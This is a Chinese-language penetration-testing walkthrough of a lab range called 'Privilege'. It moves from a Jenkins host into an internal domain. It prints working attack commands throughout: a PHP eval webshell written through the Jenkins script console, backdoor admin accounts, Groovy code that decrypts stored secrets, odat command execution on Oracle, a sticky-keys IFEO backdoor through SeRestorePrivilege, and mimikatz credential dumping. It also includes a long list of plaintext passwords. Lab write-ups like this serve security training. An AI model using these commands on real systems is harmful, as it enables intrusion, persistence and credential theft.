启动！启动！

春秋云境-Privilege

Jenkins利用

.\fscan64.exe -h 121.89.197.147 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 121.89.197.147  is alive
[*] Icmp alive hosts len is: 1
121.89.197.147:80 open
121.89.197.147:135 open
121.89.197.147:139 open
121.89.197.147:3306 open
121.89.197.147:3389 open
121.89.197.147:8080 open
121.89.197.147:15774 open
121.89.197.147:47001 open
121.89.197.147:49664 open
121.89.197.147:49665 open
121.89.197.147:49666 open
121.89.197.147:49667 open
121.89.197.147:49669 open
121.89.197.147:49670 open
121.89.197.147:49678 open
121.89.197.147:49677 open
[*] alive ports len is: 16
start vulscan
已完成 0/16 [-] mysql 121.89.197.147:3306 root 123456 Error 1130: Host '125.86.164.172' is not allowed to connect to this MySQL server
[*] NetInfo:
[*]121.89.197.147
   [->]XR-JENKINS
   [->]172.22.14.7
[*] WebTitle: http://121.89.197.147     code:200 len:54732  title:XR SHOP
[*] WebTitle: http://121.89.197.147:47001 code:404 len:315    title:Not Found
[*] WebTitle: http://121.89.197.147:8080 code:403 len:548    title:None
[+] http://121.89.197.147/www.zip poc-yaml-backup-file

就扫了一次，端口可能有些误报，不过扫出了一个备份路径/www.zip

80端口XR SHOP是一个wordpress搭的站

8080端口则是Jenkins的登陆框

俩个没试出来弱口令

根据提示思路应该是备份文件->任意文件读取->读取Jenkins初始管理员密码->Getshell

把/www.zip下下来看看，文件太多了，结合Seay来找找可用的漏洞点

/tools/content-log.php，这么直接？

验证一下

http://121.89.197.147/tools/content-log.php?logfile=C:\Windows\System32\drivers\etc\hosts

权限较高，可以直接读系统文件

根据提示：Jenkins 配置目录为C:\ProgramData\Jenkins\.jenkins。

去读C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword的初始密码

http://121.89.197.147/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins

admin
510235cf43f14e83b88a9f144199655b

拿账号密码登录到后台

找到Manager Jenkins下的script Console

想起来之前打过的一个旧版本的Jenkins也是在这能够执行命令，不过那次是linux

system权限，先写Webshell

println "cmd.exe /c echo ^<?php eval(\$_POST[1]);?^> > C:\\phpstudy_pro\\WWW\\1.php".execute().text

再创建用户用于远程连接

直接远程连接操作好像方便多了

println "net user hey qwer1234! /add".execute().text
println "net localgroup administrators hey /add".execute().text

flag1

内网信息搜集，代理搭建

C:\Users\hey>ipconfig

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::203f:e515:d906:8e03%3
   IPv4 地址 . . . . . . . . . . . . : 172.22.14.7
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . : 172.22.255.253
    

C:\Users\hey>systeminfo

主机名:           XR-JENKINS
OS 名称:          Microsoft Windows Server 2019 Datacenter
OS 版本:          10.0.17763 暂缺 Build 17763
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:
注册的组织:       Aliyun
产品 ID:          00430-00000-00000-AA295
初始安装日期:     2022/12/25, 14:05:31
系统启动时间:     2024/3/6, 19:11:04
系统制造商:       Alibaba Cloud
系统型号:         Alibaba Cloud ECS
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz
BIOS 版本:        SeaBIOS 449e491, 2014/4/1
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00) 北京，重庆，香港特别行政区，乌鲁木齐
物理内存总量:     3,950 MB
可用的物理内存:   1,711 MB
虚拟内存: 最大值: 5,358 MB
虚拟内存: 可用:   2,879 MB
虚拟内存: 使用中: 2,479 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       \\XR-JENKINS
修补程序:         安装了 7 个修补程序。
                  [01]: KB5020615
                  [02]: KB4470788
                  [03]: KB4486153
                  [04]: KB4486155
                  [05]: KB5005112
                  [06]: KB5019966
                  [07]: KB5020374
网卡:             安装了 1 个 NIC。
                  [01]: Red Hat VirtIO Ethernet Adapter
                      连接名:      以太网
                      启用 DHCP:   是
                      DHCP 服务器: 172.22.255.253
                      IP 地址
                        [01]: 172.22.14.7
                        [02]: fe80::203f:e515:d906:8e03
Hyper-V 要求:     已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。

存在域WORKGROUP，先扫一下内网

.\fscan64.exe -h 172.22.14.7/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.14.7     is alive
(icmp) Target 172.22.14.11    is alive
(icmp) Target 172.22.14.16    is alive
(icmp) Target 172.22.14.31    is alive
(icmp) Target 172.22.14.46    is alive
[*] Icmp alive hosts len is: 5
172.22.14.11:445 open
172.22.14.16:22 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.11:88 open
172.22.14.16:8060 open
172.22.14.7:8080 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo:
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo:
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] NetInfo:
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetInfo:
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] WebTitle: http://172.22.14.7:8080   code:403 len:548    title:None
[*] WebTitle: http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetBios: 172.22.14.31    WORKGROUP\XR-ORACLE
[*] NetBios: 172.22.14.46    XIAORANG\XR-0923
[*] NetBios: 172.22.14.11    [+]DC XIAORANG\XR-DC
[*] WebTitle: http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle: http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle: http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle: http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab
[+] http://172.22.14.7/www.zip poc-yaml-backup-file
已完成 20/22 [-] ssh 172.22.14.16:22 root Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
已完成 22/22
[*] 扫描结束,耗时: 2m8.1840413s

分析一下

172.22.14.31    WORKGROUP\XR-ORACLE 可能oracle数据库
172.22.14.46    XIAORANG\XR-0923  IIS Windows Server
172.22.14.11    域控 XIAORANG\XR-DC
172.22.14.7     已拿下
172.22.14.16    GitLab

搭代理

感觉远程桌面没杀软，把工具传进去打也挺方便的，代理其实不是很需要，不过还是搭一下吧

./frps -c ./frps.toml     // vps
.\frpc.exe -c frpc.toml     // 受害机

Gitlab API Token利用

根据题目提示：管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

在C:/ProgramData/Jenkins/.jenkins/credentials.xml翻到api token

<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

然后回Jenkins控制台进行解密

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

解密：glpat-7kD_qLH2PiQv_ywB9hz2

看wp发现也可以直接在控制台执行 Groovy 拿到解密后的 api token

com.cloudbees.plugins.credentials.SystemCredentialsProvider.getInstance().getCredentials().forEach{
  it.properties.each { prop, val ->
    println(prop + ' = "' + val + '"')
  }
  println("-----------------------")
}

然后用api列出gitlab的项目

proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

[{
	"id": 6,
	"description": null,
	"name": "Internal Secret",
	"name_with_namespace": "XRLAB / Internal Secret",
	"path": "internal-secret",
	"path_with_namespace": "xrlab/internal-secret",
	"created_at": "2022-12-25T08:30:12.362Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
	"readme_url": null,
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T08:30:12.362Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 4,
	"description": null,
	"name": "XRAdmin",
	"name_with_namespace": "XRLAB / XRAdmin",
	"path": "xradmin",
	"path_with_namespace": "xrlab/xradmin",
	"created_at": "2022-12-25T07:48:16.751Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2023-05-30T10:27:31.762Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 3,
	"description": null,
	"name": "Awenode",
	"name_with_namespace": "XRLAB / Awenode",
	"path": "awenode",
	"path_with_namespace": "xrlab/awenode",
	"created_at": "2022-12-25T07:46:43.635Z",
	"default_branch": "master",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:46:43.635Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 2,
	"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
	"name": "XRWiki",
	"name_with_namespace": "XRLAB / XRWiki",
	"path": "xrwiki",
	"path_with_namespace": "xrlab/xrwiki",
	"created_at": "2022-12-25T07:44:18.589Z",
	"default_branch": "master",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
	"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
	"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
	"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:44:18.589Z",
	"namespace": {
		"id": 8,
		"name": "XRLAB",
		"path": "xrlab",
		"kind": "group",
		"full_path": "xrlab",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
	}
}, {
	"id": 1,
	"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
	"name": "Monitoring",
	"name_with_namespace": "GitLab Instance / Monitoring",
	"path": "Monitoring",
	"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
	"created_at": "2022-12-25T07:18:20.914Z",
	"default_branch": "main",
	"tag_list": [],
	"topics": [],
	"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
	"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
	"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
	"readme_url": null,
	"avatar_url": null,
	"forks_count": 0,
	"star_count": 0,
	"last_activity_at": "2022-12-25T07:18:20.914Z",
	"namespace": {
		"id": 2,
		"name": "GitLab Instance",
		"path": "gitlab-instance-23352f48",
		"kind": "group",
		"full_path": "gitlab-instance-23352f48",
		"parent_id": null,
		"avatar_url": null,
		"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
	}
}]

存在下面这几个项目，但就前面两个有用, 其他都是 GitLab默认存在的

xrlab/internal-secret
xrlab/xradmin
xrlab/awenode
xrlab/xrwiki
gitlab-instance-23352f48/Monitoring

clone下来

proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git

internal-secret 项目中有 credentials.txt文件，里面是Machine对应的账号密码，应该需要密码喷洒

application-druid.yml翻到数据库账号密码

url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf

Oracle DBA RCE

用navicat连接，但是会报错，根据下面的文章进行解决:Oracle ORA-28547:connection to server failed,probable Oracle Net admin error问题解决-CSDN博客

连接的时候要选择角色为DBA

Navicat配置只能连接Oracle10版本的数据库，但是需要连接Oracle11的数据库。

select * from dba_role_privs where granted_role='DBA';

因为xradmin有DBA权限，用odat就能直接执行命令了，就不连navicat，直接添加账号远程连接了

proxychains4 ./odat-libc2.17-x86_64 dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user hey qwer1234! /add'
proxychains4 ./odat-libc2.17-x86_64 dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators hey /add'

SeRestorePrivilege提权

回到internal-secret 项目中有 credentials.txt文件

Machine | Username | Password
-----------------------------
XR-0776 | huangmin | 8I5VZpg4Mf
XR-0777 | zhangrong | cHY716Zauf
XR-0778 | liying | JKe5IFEasb
XR-0779 | zhaoli | bYaT8pnoQ7
XR-0780 | zhangyan | EyHJTxY5LA
XR-0781 | zhoujing | 7AJXxfY9Oi
XR-0782 | liuying | 3Q29kxupsU
XR-0783 | wanghao | APQ5Sxvd0n
XR-0784 | wangqiang | WebaBkv4lh
XR-0785 | wanglu | 5CtYa9XmZW
XR-0786 | zhaoyong | FbquAxEwJf
XR-0787 | zhangli | pCuPEbYl8B
XR-0788 | wangning | JL6By9mUDP
XR-0789 | wangyu | WVIrHMljRh
XR-0790 | yangli | hNuHLKxU6m
XR-0791 | zhangqian | e7RSK4wnLV
XR-0792 | lishuai | ymjieu5FzP
XR-0793 | yangliu | QXfZmcSV97
XR-0794 | wangying | 51Je2P8iFB
XR-0795 | chenjie | jFGv3tKSp9
XR-0796 | yangyong | wafYnDCJxv
XR-0797 | lipeng | YCo0bBQrNJ
XR-0798 | lixin | pT1DUgbflC
XR-0799 | liukai | EgywVJW2Un
XR-0800 | machao | H1XqljRYgD
XR-0801 | lijia | vxjUbe1K7V
XR-0802 | zhangping | lPq6LmHh8x
XR-0803 | zhanghui | Z4mjpzt281
XR-0804 | zhangwen | hT0wp2xKdJ
XR-0805 | wangmin | 6ykzR2AuKh
XR-0806 | chenlin | QPEFJ7c8io
XR-0807 | chenjuan | kAsC9UvBfP
XR-0808 | lining | 4QgT65dbMz
XR-0809 | wangwei | MZ3ehq8Gd0
XR-0810 | zhangnan | 1uXL5jvblq
XR-0811 | wangxia | K04W23mUXx
XR-0812 | zhangyu | CiycwuGxHE
XR-0813 | chenchen | q5GPSZv2rB
XR-0814 | wangbing | tHgvbCRj5F
XR-0815 | lilin | bTrGF97RMJ
XR-0816 | zhangling | T5HfUYwh8n
XR-0817 | chenling | 2MH0sXUvnN
XR-0818 | yangmei | jJ4iKS6WMN
XR-0819 | liuqiang | LRptNZWUAh
XR-0820 | lihong | TXbnO76oNg
XR-0821 | lilei | qvaN1rK0AY
XR-0822 | wanghuan | X3iFcTyOmv
XR-0823 | wangxin | ADSMd4l5w8
XR-0824 | yangping | QRiej9HcTK
XR-0825 | lijie | Az9OG4ibCH
XR-0826 | wangqian | PB9KAtTjWC
XR-0827 | liping | R8qFTAQV63
XR-0828 | liuhui | YOzAaNq8Io
XR-0829 | zhangming | 4p08EcFzsm
XR-0830 | zhangying | MHPwUoQImi
XR-0831 | libo | E23ztI9LUe
XR-0832 | liuqin | bsmrRkLoqT
XR-0833 | wangchao | ACz5Q73oUa
XR-0834 | liuli | x2XuZsIJtm
XR-0835 | yangwei | wKYHlDXkmq
XR-0836 | wangyan | yg1HXxWu2s
XR-0837 | wangjian | zUo7vHb8OY
XR-0838 | zhangbin | r8m01CcS4f
XR-0839 | wangli | Im8WSeGlEf
XR-0840 | wangdan | qIvBQ0p1kP
XR-0841 | liuxia | B69KWIACtq
XR-0842 | zhangrui | u2KVeb683m
XR-0843 | wangdong | rEtTIU8BLD
XR-0844 | wangting | Jkunlz29eg
XR-0845 | zhangjian | Zyp9lDorhg
XR-0846 | wanghua | 74ksE5BmHc
XR-0847 | liyan | rEOAslLQR0
XR-0848 | liufeng | LUZcuoFxfG
XR-0849 | zhangbo | XHvBV4ujQc
XR-0850 | liuming | jBWDJfZ93c
XR-0851 | liujia | PmpXKckTs9
XR-0852 | chentao | 2sHutpN8iY
XR-0853 | zhangting | e3wg2nIu7Z
XR-0854 | liushuai | iY2fbz1HQB
XR-0855 | lijing | MCIcl6sgNQ
XR-0856 | wangbin | msxNSIlj8G
XR-0857 | lijian | IUilEz5SYQ
XR-0858 | zhouyong | v36CT5ILMU
XR-0859 | liudan | AKkCpEnLvx
XR-0860 | yangbin | yE9G3VSnsO
XR-0861 | liupeng | ryLTgeDZhI
XR-0862 | chenjun | kngEGACsQh
XR-0863 | wangbo | FbK6fsiPBn
XR-0864 | libin | b2BcHWCEYO
XR-0865 | zhaowei | 2hrJ64tgqG
XR-0866 | lijuan | XBkgKysUbz
XR-0867 | chenchao | oDU7vPZ84B
XR-0868 | wangming | vKpV13DemJ
XR-0869 | lifang | TbzE3tWF4y
XR-0870 | wangtao | yaxpPWRkiB
XR-0871 | liufang | Fde8Gt1bmq
XR-0872 | litao | VCurpwXIA4
XR-0873 | yangling | PInqR2xBK0
XR-0874 | yangxue | sxjQ75mLzK
XR-0875 | liubin | sWeharCdXE
XR-0876 | yangyang | FZ6r8LMA5U
XR-0877 | xuwei | 0B4Du1h7zV
XR-0878 | chenyong | Folq5iOnej
XR-0879 | yangbo | ZlIs9LYNeW
XR-0880 | zhanghua | oFHU1Z0VKM
XR-0881 | zhaomin | IafjNO3Hib
XR-0882 | chenping | qJQXKkVpFP
XR-0883 | zhanglei | 61kcLxqTiu
XR-0884 | zhangliang | j5Ls2Hub3i
XR-0885 | zhangtao | 5PAcQGy461
XR-0886 | zhangxue | eY3DrwsijQ
XR-0887 | liqian | 7jHvompSTN
XR-0888 | liwei | wjTFE8x0IY
XR-0889 | chenbin | sm7lR86Y4p
XR-0890 | zhangyun | mWzkyDJMRq
XR-0891 | wangxue | pfR5VoUZO1
XR-0892 | zhouwei | oN3Sd60khs
XR-0893 | likai | QwzvK1qm4j
XR-0894 | gaofeng | 5fQvjFU1uN
XR-0895 | wanglei | 1apTkBr9Y6
XR-0896 | lijun | cVBI8nsCwA
XR-0897 | liuwei | 0VBecvT4Au
XR-0898 | wanggang | rCGB4wFh5X
XR-0899 | liuping | UQaX9DBLbJ
XR-0900 | zhangning | SLqJiM1QTy
XR-0901 | libing | ZgXlj6VKPu
XR-0902 | zhangchao | tSBpVjiYh8
XR-0903 | zhangxia | hRlYXkqceC
XR-0904 | limin | s3I4lFctoE
XR-0905 | liulei | V5rsKkeWSJ
XR-0906 | wangling | lL7QinBydG
XR-0907 | zhangfei | jO1xtU6hP4
XR-0908 | chenlong | wKDFqcOfmp
XR-0909 | liufei | 36BjIW1VgH
XR-0910 | chenli | eYiOh4jWUq
XR-0911 | chenyan | oad8rYbwfs
XR-0912 | chenpeng | US2Am1iIk8
XR-0913 | wangrui | DTZ1xgz3cS
XR-0914 | zhangfeng | SHxNByGuwX
XR-0915 | yanglin | riwW3UkI4o
XR-0916 | liutao | HFVUOZEPpL
XR-0917 | liyong | wZyEuVvOjQ
XR-0918 | wangna | 6i840wmbv1
XR-0919 | wangjuan | fJv4PKASzb
XR-0920 | wanghui | 7qT4wcMSGv
XR-0921 | lilong | pHTkl3dEIU
XR-0922 | lili | 0LRQxIuV9t
XR-0923 | zhangshuai | wSbEajHzZs
XR-0924 | zhangfan | TrfCMlmY59
XR-0925 | liujing | gtOslNQDB2
XR-0926 | liuqian | tqX9DVLTHI
XR-0927 | yangfang | sa18OlILmB
XR-0928 | chenqiang | VEKnlwgFpU
XR-0929 | liqiang | pZbj7z9H8v
XR-0930 | yangjun | pqahdFK2PZ
XR-0931 | chenbo | 78SmUu1gfi
XR-0932 | zhangyong | CS4sx0MvUF
XR-0933 | wangliang | 4vV6UjqzOQ
XR-0934 | wangxu | UfTgi40DV9
XR-0935 | chenhua | lWS207vdOf
XR-0936 | zhouli | DuMiQOb0qK
XR-0937 | liubing | NXwAreabgd
XR-0938 | zhaojing | Ru3Gen8YBM
XR-0939 | yangyan | IHrpmeTNfl
XR-0940 | chenfang | d3nUGRgs24
XR-0941 | zhanghao | Yu0ZbEKFIT
XR-0942 | wangyun | 0rwTmed8SJ
XR-0943 | zhangxin | 8vPF5hzoAa
XR-0944 | zhangwei | YLwUpHNS6X
XR-0945 | wangping | FqhfMozSXp
XR-0946 | wangkai | D04bXHTKpc
XR-0947 | liuchang | Ue60X3sGrS
XR-0948 | lixue | CHbgqOTeIc
XR-0949 | lina | rwanydljVu
XR-0950 | liwen | edc0M7yvQu
XR-0951 | liming | yziSjWBoCH
XR-0952 | liling | wmdjRaIBAS
XR-0953 | chenwei | xcqN5VPbCM
XR-0954 | lihao | iUpmDYS2CL
XR-0955 | wanglin | 5pgFojT6wI
XR-0956 | zhanglin | x7OgKTdhyQ
XR-0957 | xumin | QuMKRHoB3U
XR-0958 | liuyan | g1wN7ydrLh
XR-0959 | zhangmin | e9XBQqEtPp
XR-0960 | zhangqiang | vcKRYUDOGL
XR-0961 | yangchao | MhUkEeWYBF
XR-0962 | yanghua | fZUCSaoiIt
XR-0963 | ligang | CdgFjNf1Mk
XR-0964 | liuxin | knHhJmBwEM
XR-0965 | liuhuan | pZSHNhjkq9
XR-0966 | lifeng | jRAkFxLT5e
XR-0967 | liugang | YA2mVzSs5K
XR-0968 | yangtao | 4b32TQLP6y
XR-0969 | liuhao | 0EPZ6Fyism
XR-0970 | lichao | ultLQzWN34
XR-0971 | yanghong | Ig2BNLMuWf
XR-0972 | chenhong | Q4eOjNym6S
XR-0973 | sunwei | drjUYgi3T0
XR-0974 | zhanghong | sRkmQIB5La
XR-0975 | zhangdan | b2HoSCuhaM
XR-0976 | liumin | FPRm6W7wGs
XR-0977 | wangmei | yq7MVcj4se
XR-0978 | zhangjing | WR4Ef16FiU
XR-0979 | liujun | DEwYySf6Ni
XR-0980 | wangyong | h9XMZiEv0g
XR-0981 | huangyong | DgoIyPSTHZ
XR-0982 | lixiang | TAoPcpiF3g
XR-0983 | zhoujie | YrlB2gMuxF
XR-0984 | liuchao | ijaDY4Ilr3
XR-0985 | liuna | 6xn2jo17SE
XR-0986 | wangjing | 65MhGVI0oL
XR-0987 | liuling | MjmN9ahSLR
XR-0988 | chenjing | ha23yfqcPg
XR-0989 | wangqin | MsdW85gzFL
XR-0990 | wanglong | O3oD1lscAK
XR-0991 | chenlei | 3vtAJqzrYB
XR-0992 | yangjie | fuTBeq6z51
XR-0993 | zhangjun | l02GAEUHq9
XR-0994 | yangming | N3bYUqfenc
XR-0995 | zhangmei | S7DG5bgXtN
XR-0996 | wangrong | 2BPmaxilGq
XR-0997 | zhangpeng | BHOqDmCXMn
XR-0998 | liuyun | CB7sxbk84I
XR-0999 | wangkun | KuJH519OWg
XR-01000 | chenmin | e4gQGHorq3
XR-01001 | liqin | 4zEJkYPIpq
XR-01002 | wangfang | FTVYd4W02u
XR-01003 | liuhua | P9ndfu8wGh
XR-01004 | zhangqin | 0f1JTN5Qqp
XR-01005 | zhanglong | nH8mDpRbcN
XR-01006 | zhangjie | cTVwM25y3h
XR-01007 | liliang | Rf6zXV0YEI
XR-01008 | liyun | 3hxTmEoMBl
XR-01009 | wangcheng | Boy4Ezp987
XR-01010 | yangjing | gjhbXHcLW0
XR-01011 | chenying | koGFcPeBmi
XR-01012 | lihua | nSOjeYV3Nr
XR-01013 | liumei | yxAm2nWNp9
XR-01014 | yangjuan | Gpe6Au2hxF
XR-01015 | lidan | ogDLzMhCVP
XR-01016 | liyang | nDWvGhNMoe
XR-01017 | zhaojun | XtfZYOxeDJ

通过刚才的内网信息收集，172.22.14.46 XIAORANG\XR-0923 IIS Windows Server

查到对应的账号密码

账户属于 Remote Desktop Users 和 Remote Management Users 组, 因此可以连接 rdp 和 winrm

XR-0923 | zhangshuai | wSbEajHzZs

远程连接上，查看账户有什么特权

whoami /priv

使用 rdp 连接时默认 cmd 是不会显示 SeRestorePrivilege 特权的, 需要右键 以管理员身份 运行

但 evil-winrm 连过去就能直接看到相关的特权

C:\Windows\system32>whoami /priv

特权信息
----------------------

特权名                        描述           状态
============================= ============== ======
SeRestorePrivilege            还原文件和目录 已禁用
SeChangeNotifyPrivilege       绕过遍历检查   已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用

因为有SeRestorePrivilege，所以能无视ACL修改文件或者编辑注册表，类似于之前的放大镜提权

可以把cmd.exe重命名为sethc.exe，然后在锁屏界面连按五次shift启动sethc提权

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"

rename sethc.exe sethc.bak
rename cmd.exe sethc.exe

在rdp上两种操作都是拒绝访问，奇怪，换evil-winrm操作

proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

cd C:\windows\system32
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

之后就是锁屏，然后连按五下shift启动粘连键

再添加个高权限的账号，然后登录翻flag

net user hey qwer1234! /add
net localgroup administrators hey /add

卷影拷贝提取SAM

mimikatz

privilege::debug
sekurlsa::logonpasswords

Authentication Id : 0 ; 15495241 (00000000:00ec7049)
Session           : RemoteInteractive from 3
User Name         : hey
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2024/3/6 22:05:27
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : hey
         * Domain   : XR-0923
         * NTLM     : 6912928308e3cda903e6d75bd6091a20
         * SHA1     : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
        tspkg :
        wdigest :
         * Username : hey
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : hey
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 12552457 (00000000:00bf8909)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2024/3/6 21:43:58
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
